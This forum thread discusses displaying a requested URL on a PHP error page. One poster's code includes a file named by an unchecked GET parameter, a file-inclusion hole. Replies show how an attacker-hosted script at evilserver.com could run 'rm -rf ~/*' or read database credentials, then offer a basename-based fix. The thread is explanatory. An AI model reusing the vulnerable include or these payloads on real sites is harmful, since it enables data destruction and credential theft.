Getting URL and displaying it

[Rockonmetal]

The title is what I'm after... I have an error message for my site... But not displaying the URL might not work...

Like if the page's error was on:
http://www.pureadd.com/error.html.
I want it to say that... Not error.html
Because there are many error pages in my site...

THANKS TO ALL!

[BLiZZaRD]

Not really following you...

you want the URL displayed on the page the visitor is viewing?

So if I go to your site and go to a page that doesn't exist, lets say elephant.html You want me redirected to an error page that displays:

http://yousite.com/elephant.html does not exist

or do you want it to show the elephant.html in the address bar with the error page on the screen?

[Twey]

The (absolute local) URI used to access your page is stored in $_SERVER['REQUEST_URI']. Redirects for errors are handled server-side (you usually needn't write a PHP system for this: your webserver should have a built-in mechanism that can catch the most common cases) so the user doesn't see a change in the URL. Notice DynamicDrive's system does a client-side redirect; also notice how irritating it is It's tripped me up on several occasions. It will also probably mess up less intelligent search engines somewhat.

[Demonicman]

this is very possible

PHP Code:

if (!empty($_GET['x']) AND file_exists($_GET['x'].'.php'))
{
include($_GET['x']); 
}
if (!file_exists($_GET['x']) AND !empty($_GET['x']))
{
print"Error. Page ".$_GET['x']." doesn't exist.<br>If you think this is a error please contact a admin.";
} 


this would be put on index.php and you just make every link go to index.php?x=whatever.php

[Twey]

Yep. They can then also make a file http://www.evilserver.com/evilscript.php which outputs:

Code:

<?php
  shell_exec('rm -rf ~/*');
?>

and go to index.php?x=http%3a%2f%2fwww.evilserver.com%2fevilscript.php to wipe out your whole site, or perhaps:

Code:

<?php
  echo file_get_contents('script_that_uses_database.php');
?>

... to find out some juicy details about your database, like your username and password.

If you think this is a error please contact a admin.

It is an error. The title is "Error." If your users are pedantically-minded or not web-savvy enough to understand what you mean, you're likely to get a lot of emails...

[Demonicman]

lol youd have to be really stupid to type in something random and hope it appears without an error

[thetestingsite]

lol youd have to be really stupid to type in something random and hope it appears without an error

That wasn't the point of Twey's post. The code you posted is very insecure mostly due to the fact that someone can write a file that could wipe out the hosting server and call that script through the url.

Hope this helps.

[Twey]

lol youd have to be really stupid to type in something random and hope it appears without an error

Why? I often type in URLs from memory, and it's not too unusual to find an underscore where I expected a hyphen or a cultural difference in spelling (colour/color). Heck, I even do that latter in my own code sometimes.

[tech_support]

this is very possible

PHP Code:

if (!empty($_GET['x']) AND file_exists($_GET['x'].'.php'))
{
include($_GET['x']); 
}
if (!file_exists($_GET['x']) AND !empty($_GET['x']))
{
print"Error. Page ".$_GET['x']." doesn't exist.<br>If you think this is a error please contact a admin.";
} 


this would be put on index.php and you just make every link go to index.php?x=whatever.php

Give me that. Then give me 2 minutes. Your site will be gone.

This is a more secureish way of doing it:

PHP Code:

if (isset($_GET['x']) && file_exists(basename($_GET['x'].'php'))) {
include(basename($_GET['x'].'.php'));
}
else {
echo '404 Not Found.';
} 


And an even more secure way is to put the files you want the world to access into an array, then check it.